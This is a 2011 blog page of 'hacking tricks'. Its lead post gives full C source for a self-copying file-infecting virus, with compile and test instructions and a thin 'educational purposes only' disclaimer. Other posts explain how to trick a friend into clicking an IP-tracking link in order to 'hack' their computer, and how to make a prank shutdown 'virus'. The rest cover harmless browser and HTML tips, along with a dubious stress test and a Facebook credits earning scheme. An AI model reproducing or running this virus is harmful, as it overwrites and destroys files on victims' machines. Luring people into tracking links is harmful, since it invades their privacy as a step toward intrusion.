Pages

Wednesday, June 29, 2011

How to Create a Computer Virus?

0 comments
This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.

#include
#include
#include
#include
#include
#include
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}


Download Borland c++
BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:
1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4.All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY and DON'T USE THIS METHOD ON YOUR PC.

Tuesday, June 28, 2011

Change your IP address in a minute

1 comments
How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.

1. Click on “Start” in the bottom left hand corner of screen.

2. Click on “Run”.

3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”.

5. Type “exit” and leave the prompt.

6. Right-click on “Network Places” or “My Network Places” on your desktop.

7. Click on “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.
8. Right click on “Local Area Connection” and click “properties”.

9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.

10. Click on “Use the following IP address” under the “General” tab.

11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).

12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.

13. Hit the “Ok” button here.

14. Hit the “Ok” button again.You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.

16. Go back to the “TCP/IP” settings.

17. This time, select “Obtain an IP address automatically”.

18. Hit “Ok”.

19. Hit “Ok” again.

20. You now have a new IP address.

Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack.In this case you need to switch off the modem and then switch it on to get the new IP address.

NOTE: All these tricks works only if you have a dynamic IP address.But if you have a static IP address you have no option to change your IP.

Know The Facts: How Magicians Cut A woman In Half

0 comments
Next time when you are at a magic show you don’t need to surprise how the magician is able to cut a women in half! Here is what goes behind the scenes

How to disable Facebook Theatre Effect?

0 comments

Recently Facebook rolled out a feature called Theatre Effect for it’s photos.

It has few advantages like, the user can easily come back to his previous page with pressing escape key. And of course it gives us some focus to photo with black background.

I personally don’t like this feature and I am comfortable with the old album design.

How to avoid this new feature and get back to old Facebook photo page?

You can follow any of the below mentioned tips to get rid of Theatre Effect.
1. Refresh browser-Click the photo you want to view. This shows the photo in Theatre Effect. Now click refresh button of your browser or press F5. This will take you the actual photo page with normal page.

2. Amend URL :Click the photo you want to view. From address bar, remove the word &theater from the URL and press enter. This will also take you to the actual photo in old style.

3. Firefox Add-on : Firefox user can install Greasemonkey add-on on the browser and then install this Userscript.

4. Chrome Extension : Google Chrome users can use Old FB Album extension or Black Album Remover to get rid of Theatre Effect

First two options works in all browser. Option one is relatively simpler if you don’t want to install any add-ons.

These tips are only to those who don’t like Theater Effect feature.

Get Location Of Anyone On Internet

0 comments
Let’s say you want to hack your friend’s computer. Well the first and the essential thing to do (of course if you’re hacking over the Internet) is to find out his IP address. There are several methods of doing it but here’s an easy one. The only thing you have to do is to actually make your friend click a link you send him. When that person clicks the link, you will receive information like IP Address, Country, Host name, Operating System /Browser Details and region name . Just follow instructions below:



Go to this link, here you have to type in your email address. Afterwards you’ll get a unique link that looks kinda like this one here http://acmepeers.com/?u=vyg. When someones clicks that link you will receive tracing reports to your email .
It looks like this .

This method will not work if the person whose information you want to get is using a proxy server.
Then you will get false information.

Dublicate Virus

0 comments
If u want to create duplicate virus than do the following thing:
Go to desktop - right click anywhere - go to new - shortcut -u will get a small box - there type in the following thing where they tell you to specify location just write the following thing -shutdown -s -t 200 -c "this is a virus" - click next - it will make your computer shut down after every 3.20 minutes you can increase it by replacing 200 and write it in seconds - And if you want to disable this virus than do the following thing :
Go to run - and type -
Shutdown.exe
-a this will make your computer normal
Note: This is only for educational purpose you are completely responsible for any illegal use of it.

7 most important things HTML beginners must consider

0 comments
When you start learning coding and web designing in HTML, you basically begin with normal HTML markup. Laying out a page, adding colors, buttons, images etc are just the basic part you never skip to design your page.

But being a beginner you must know that no matter how basic your code is it can still have some uninvited errors. There are certain important things that you must consider to make your coding valid and capable to view in any browser window.

Let’s discuss what those 7 things are.
Make your code human readable

Because you are a HTML beginner, you are never going to use any HTML editing software like Dreamweaver, FrontPage, etc. are you? You literally start with a NOTEPAD or similar text editor and start coding but have you ever thought that you need revise your HTML markup sometime?

In the image below can you easily find the parent tag or its order?

The answer to the question is probably no if you are a beginner. Because such type of coding is just easily readable by the browser not the user. You must make it clearly readable by yourself so that you can easily find the section you are looking for in future modification.

Though the HTML tags are enclosed in “<” and “>” our brain cannot easily distinguish it from other character easily in such a huge crowd. Instead you can use CAPITAL LETTERS to rectify the HTML tag out of the web contents.

Look how the tags are distinguishable from the text contents.

Other thing you can do is make a tree order so that you can easily find the parent or child of the tag easily. This can be done by leaving some space from the right. See the example image below for more clarification.
This trick will make you easy to edit and look for the exact tag when necessary.

Using of HTML comments wisely
It is not much necessary to use HTML comments because, HTML comments are for users and browser doesn’t render it in its window. The necessity of HTML comments rises when your HTML markup goes more complex and complex. In such case using of HTML comments is necessary. As we’ve already discussed about human readability of the code in first step.

The HTML comments start with “” everything between the start and end code is not rendered in browser screen but you can easily find the it in it’s source.


Always close the tag
I understand you know this fact, but when the codes get complicated with larger contents and lots of inner divisions and blocks you’ll get confused in the middle of the path. Basically, when you view the HTML page that have unknown incomplete tags, the contents will be visible with no errors. But incase if you have added some CSS styling and tables to your web design layout you’ll probably have lots of error and fault in proper rendering in such unknown incomplete tags. Therefore ending a tag is most important thing.

Even though you are aware about it you miss to close the tag because we cannot always remember which tag was opened first and which was at last. But there is a trick (or say tips) that you can apply to have your HTML tags complete one.

Whenever you begin for a new HTML tag, close it immediately after the opening of tag.

For example, look at the sample coding below. The "BODY" tag is closed instantly after it’s opening.

Then you can start filling the contents and other sub tags inside it.


Always provide alternate text for the image
This trick though won’t affect your coding, user readability or browser render-ability, it is recommended that you use alternate tags.



The above tag renders a image file named image.jpg from the specified source. But incase if you don’t have the image in specified location or mistakenly deleted the image file it will render nothing (in some browser it will show image icon or red cross icon).

Remember how important the image can be to the web page visitor. To understand your contents, S/he must know what the image was about. You must use alternet text what will show up when browser is unable to locate your image file. This will at least give the imaginative picture of the unknown image.

”Image

Proper sequence of Headers
H1 is the first and largest header of your HTML document. If you use header (H1, H2, H3) tags you must use it in sequence. For example, H1 must be preceeded by H2 or H3 or H4 but they must not be parented under smaller header see the image below.





But this one is not right because, lower header must not parent larger header. Though this won’t show any error it is not considered as good method.

Moreover parenting headers is not recommended even it is acceptable and can be rendered properly.

Use of block and inline HTML elements
You must understand the meaning of block and inline HTML elements. Usually a HTML element can be a block or inline element. The block element is like a box that can contain other contents inside it. The inline elements doesn’t have box wrapped around it and only occupies the space that its contents have. While block element occupies as much space as it is capable of until the size or width is specified.

"DIV" is literally a block element while "SPAN", "STRONG", "EM", "I", etc are inline elements. "DIV" inside "SPAN" is not recommended but you can use as many "SPAN" as you can inside "DIV".

Seventh? What can be the seventh one? Comment here.

Check Your stress

0 comments
Do You think that you are stressed today if yes then how much?? is the question. now i have got a way to check it out jut look at the circles below the faster it moves the more you are stressed when it was placed infront of murderer it seemed moving very fast to him.Now try it yourself.



Liked it. Have a comment below

Monday, June 27, 2011

Facebook Credits

0 comments

As we know nowadays everyone wants to have some profit from any job or work.For this everyone searches for various ways. Today i have got a way to get money from the social networking site facebook. One can easily earn credits from this site without any difficulty.
It;s so simple. you just have to login and register your facebook account to the Facebook crediting site and in just few steps you are done and earn well while chatting or commenting.
Click here to begin from .
Sign In

Hack Facebook Chat

0 comments

In this post I will tell you how you can hack facebook chat application to run it from any windows, Using this hack you will be able to chat with your freinds on other browser pages, So here is the step by step guide to hack facebook chat application.
Note:This trick to hack facebook chat application works for firefox browser only
1.First of all log into your Facebook account
2.Next visit the following link:
http://www.facebook.com/presence/popout.php


3.Next press control D and bookmark the Page


4.Next click on the bookmark option at the top beside history button and right click Facebook chat at the bottom and Check load this bookmark in the sidebar and click on ok.




Now you can load Facebook chat application from any browser


Hope You will like this and have a comment on it
 

Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com